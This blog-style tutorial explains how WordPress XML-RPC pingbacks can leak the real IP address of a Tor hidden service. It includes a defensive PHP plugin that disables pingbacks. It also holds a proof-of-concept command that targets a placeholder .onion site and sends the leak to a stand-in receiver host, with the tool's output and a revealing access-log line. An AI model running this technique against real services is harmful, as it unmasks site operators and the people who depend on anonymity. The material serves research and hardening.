What is Tor

Tor, short for The Onion Router, is free and open-source software that helps users maintain their online privacy and anonymity. It works by routing internet traffic through a series of servers operated by volunteers around the world. Each server encrypts and forwards the data to the next server in the chain. As a result, tracing the origin of the data becomes challenging, which makes Tor an attractive option for individuals who want to remain anonymous online.

However, this anonymity also attracts illegal activities, such as drug trafficking, money laundering, and illegal pornography. Law enforcement agencies have struggled to track down these illegal activities, as the perpetrators often use Tor to hide their IP addresses.

Exposing Tor Domains and their IP

Despite the anonymity provided by Tor, it is possible to expose the IP address of a Tor domain. This can be done through a variety of methods, including exploiting vulnerabilities in the Tor network, monitoring network traffic, and using social engineering techniques to trick users into revealing their IP address.

One way to expose the IP address of a Tor domain is by exploiting a vulnerability in the WordPress XMLRPC ping function. WordPress sites use this function to notify search engines and other services about new content on the site. By default, the function sends a ping to the site's own URL, but it can also be directed at any URL, including Tor domains.

When a pingback is sent to a Tor domain through the XMLRPC ping function, the WordPress server behind that domain makes an outbound request to verify the pingback, and that request reveals its real IP address, which can then be used to locate the server. This technique has been used by law enforcement agencies to track down illegal Tor domains, including drug markets, illegal pornography sites, and other criminal operations.
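As an added hardening example from the hidden-service operator's side (not code from the original post or from the Tor-Wordpress-IP-Leaker project), the following WordPress must-use plugin removes the pingback methods this technique relies on; the install path is an assumption about a standard WordPress layout.

```php
<?php
/**
 * Plugin Name: Disable XML-RPC pingbacks
 * Description: Hardening for WordPress served as a Tor hidden service.
 *              Added example, not code from the original post.
 *
 * Install as wp-content/mu-plugins/disable-pingbacks.php (assumed path).
 * Must-use plugins load on every request and cannot be deactivated
 * from the dashboard.
 */

// Drop the pingback methods from the XML-RPC dispatch table. A
// pingback.ping call then gets a "method does not exist" fault, so
// WordPress never fetches the caller-supplied source URL and never
// makes the outbound verification request that exposes its real IP.
add_filter( 'xmlrpc_methods', function ( array $methods ) {
    unset( $methods['pingback.ping'], $methods['pingback.extensions.getPingbacks'] );
    return $methods;
} );

// Stop advertising pingback support: the X-Pingback response header
// points clients at xmlrpc.php.
add_filter( 'wp_headers', function ( array $headers ) {
    unset( $headers['X-Pingback'] );
    return $headers;
} );

// Remove the Really Simple Discovery <link> from <head>; it also
// announces the xmlrpc.php endpoint.
remove_action( 'wp_head', 'rsd_link' );

// Caveat: returning false from the 'xmlrpc_enabled' filter is NOT
// sufficient on its own. That filter only gates methods that require
// authentication; pingback.ping is unauthenticated and still runs.
```

The plugin closes only the pingback path; the structural fix is an egress policy that lets the web server reach the outside solely through Tor, so no outbound request it makes can originate from the real address.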

Proof of concept

Only use this proof of concept for research and educational purposes!
This proof of concept has removed IP addresses and other sensitive information for security reasons.

To get the IP from a Tor domain we are going to use a script made by Joshua van der Poll, available at joshuavanderpoll/Tor-Wordpress-IP-Leaker. This script does almost all the work for us: it searches the target's website for blog posts and then sends the pingback request over Tor. The only thing left for us is to check our access logs.

After downloading the GitHub repository and following the setup steps from the README.md file, we execute the script. I'm going to execute the following command:

$ python3 wp_xmlrpc_leak.py --host="http://wordpress_target.onion/" --pingback="http://leaked_ip_receiver.com"
which results in the following response:
Tor WordPress XMLRPC IP Leaker
[•] Made by: https://github.com/joshuavanderpoll/Tor-Wordpress-IP-Leaker
[@] Trying to get a blog post to use for pingback requests...
[@] Trying HTML body method...
[√] Retrieved post link from HTML.
[√] Using post http://wordpress_target.onion/?p=1...
[√] Sent XMLRPC pingback request to http://leaked_ip_receiver.com/wordpress_target.onion.
[√] Received success response from XMLRPC request.

[√] Check your receiver's host its request/access logs to see the target it's IP.
As you can see, I've received a successful response from the XMLRPC request, which should mean I have new access logs at my receiver's website. Checking the logs on the receiver website, I see lines like:
1.2.3.4 - - [29/Dec/2022:20:15:19 +0000] "GET /wordpress_target.onion HTTP/1.1" 404 5277 "http://leaked_ip_receiver.com/wordpress_target.onion" "WordPress/6.0.1; http://wordpress_target.onion; verifying pingback from 127.0.0.1"
In this log line, you can see that the IP 1.2.3.4 has sent us a "verifying pingback" request using "WordPress/6.0.1". We can see the target Tor domain in the "GET /wordpress_target.onion HTTP/1.1" part, because the script puts the target domain in the URL of the receiver host. This tells us that "wordpress_target.onion" has the IP address "1.2.3.4".

Summary

While Tor provides a high level of anonymity and privacy, it is not foolproof. There are several ways to expose the IP address of a Tor domain, including exploiting vulnerabilities, monitoring network traffic, and using social engineering techniques. The WordPress XMLRPC ping function is one example of how Tor domains can be exposed, and it has been used successfully by law enforcement agencies to track down illegal activities on the dark web. It is essential to understand the risks and limitations of using Tor and to take appropriate measures to protect your online privacy and security.